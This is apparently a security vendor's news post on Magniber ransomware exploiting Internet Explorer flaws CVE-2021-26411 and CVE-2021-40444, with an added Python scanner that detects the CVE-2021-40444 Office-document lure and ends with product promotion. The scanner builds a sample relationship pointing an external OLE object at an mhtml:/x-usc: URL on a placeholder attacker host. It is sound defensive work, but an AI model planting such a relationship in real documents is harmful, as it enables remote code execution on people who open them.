The Magniber ransomware gang has changed its delivery method: the group is now spreading the ransomware and encrypting victims' devices by exploiting two Internet Explorer vulnerabilities.
Internet Explorer Vulnerabilities Targeted by Magniber Ransomware
As BleepingComputer reports, the Magniber ransomware gang is exploiting two Internet Explorer vulnerabilities.
The first, CVE-2021-26411, is a memory corruption bug in Internet Explorer rated CVSS 8.8 and patched in March this year. Microsoft's advisory describes the attack scenario as follows:
An attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. The attacker could also take advantage of compromised websites or websites that accept or host user-provided content or advertisements, by adding specially crafted content that could exploit the vulnerability.
The second, CVE-2021-40444, also rated CVSS 8.8, is a remote code execution vulnerability in MSHTML, the browser rendering engine used by Internet Explorer (and embeddable in Office documents). Microsoft's initial advisory put it this way:
Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document.
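The MSHTML paragraph above describes the delivery chain at a high level. In the publicly documented CVE-2021-40444 lures, the Office document carries an external OLE-object relationship whose target uses the `mhtml:` URL scheme (often chained with `x-usc:`), which makes Word hand the attacker's remote HTML to MSHTML and load the malicious ActiveX control. The following triage scanner checks an Office (OOXML) file for exactly that pattern. It is an added example written for this page, not code from the original article, from Microsoft or from Heimdal; the two documents it scans are constructed in memory and the `attacker.example` host is a placeholder, not a real indicator.

```python
"""Triage scanner for the CVE-2021-40444 (MSHTML) delivery pattern in OOXML files:
an external OLE-object relationship whose target is an mhtml:/x-usc: URL.

Added example for this article; the sample documents are constructed below.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
RELS_PART = "word/_rels/document.xml.rels"

# Relationship type Word uses for embedded OLE objects; the abused one in the lures.
OLE_REL_TYPE_SUFFIX = "/relationships/oleObject"

# mhtml: targets, optionally chained with the x-usc: sub-URL form seen in public
# samples, e.g. "mhtml:http://host/x.html!x-usc:http://host/x.html".
SUSPICIOUS_TARGET = re.compile(r"^\s*(mhtml:|x-usc:)", re.IGNORECASE)


def scan_docx_bytes(data: bytes) -> list:
    """Return one finding string per suspicious relationship (empty list == clean).

    Every *.rels part in the package is inspected, not just the main document's,
    so a payload referenced from a header, footer or other part is also caught.
    Raises zipfile.BadZipFile for input that is not an OOXML zip container.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in (n for n in zf.namelist() if n.endswith(".rels")):
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                if rel.get("TargetMode", "").lower() != "external":
                    continue  # internal parts are not fetched over the network
                short_type = rtype.rsplit("/", 1)[-1]
                if SUSPICIOUS_TARGET.match(target):
                    findings.append(
                        f"{part}: external {short_type} with mhtml/x-usc target: {target}")
                elif rtype.endswith(OLE_REL_TYPE_SUFFIX):
                    # External OLE objects are rare in legitimate documents and
                    # deserve a look even without the mhtml: scheme.
                    findings.append(f"{part}: external oleObject target: {target}")
    return findings


def _build_docx(rels_xml: str) -> bytes:
    """Construct a minimal .docx-like zip around the given relationships part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


# Constructed sample reproducing the external oleObject -> mhtml: pattern.
# "attacker.example" is a placeholder host, not a real indicator.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
      Target="mhtml:http://attacker.example/word.html!x-usc:http://attacker.example/word.html" TargetMode="External"/>
</Relationships>"""

# Constructed benign sample: internal parts plus an ordinary external hyperlink.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.org/" TargetMode="External"/>
</Relationships>"""

MALICIOUS_DOCX = _build_docx(MALICIOUS_RELS)
BENIGN_DOCX = _build_docx(BENIGN_RELS)

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        hits = scan_docx_bytes(blob)
        print(f"{name}: {'SUSPICIOUS' if hits else 'clean'}")
        for hit in hits:
            print("  -", hit)
```

The check deliberately ignores internal relationships and ordinary external hyperlinks, so it does not flag every document that links out; what it flags is the combination that CVE-2021-40444 needs, an external OLE object or an `mhtml:`/`x-usc:` target. It is a triage filter for mail gateways or IR file review, not a replacement for patching: the fix is to apply the September 2021 update, and Microsoft's interim workaround was disabling ActiveX in Internet Explorer's security zones.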
The Magniber Ransomware: Some Background
The Magniber operators typically exploit whatever vulnerabilities they can find to break into systems, with the end goal of delivering their ransomware.
They began operating in 2017 and are considered the successors of the Cerber ransomware. Initially they targeted only victims in South Korea; the gang later expanded to other Asian countries such as China, Singapore and Malaysia.
There is currently no decryptor available for this strain. Another particularity of Magniber is that it has not adopted double-extortion techniques: for now, its attacks are limited to file encryption, without data theft.
As we also reported, in August this year Magniber targeted the PrintNightmare vulnerabilities in order to breach Windows systems.
Why Did Magniber Ransomware Gang Start to Target IE Vulnerabilities?
BleepingComputer points to two possible reasons for the shift. First, the PrintNightmare patches and updates were widely publicized by Microsoft and security researchers in the intervening months, so fewer systems remain exposed. Second, the attackers may have moved to an easier target: Internet Explorer vulnerabilities can be triggered simply by a curious user opening a file or visiting a web page.
Researchers at Tencent Security, who published the report on this recent Magniber activity, also noted that the threat actors combine exploitation of the IE flaws with malvertising, using malicious advertisements to push exploit kits to visitors.
How Can Heimdal™ Help?
Given the recent wave of cyberattacks, encryption attempts and other malware distributed online, it is worth taking a closer look at proper cybersecurity solutions for a corporate environment. Heimdal™ Threat Prevention and Heimdal™ Ransomware Encryption Protection can help here. The first, available for both local and cloud protection, is a predictive endpoint DNS security solution that filters traffic at the domain level, relevant because an estimated 91% of online threats use DNS to propagate. It also recently received the "Best Cloud-Delivered Security Solution" award at the Network Computing Awards 2021.
The second blocks ransomware encryption attempts, protecting you from both data encryption and data exfiltration. Both solutions work alongside any antivirus you already have.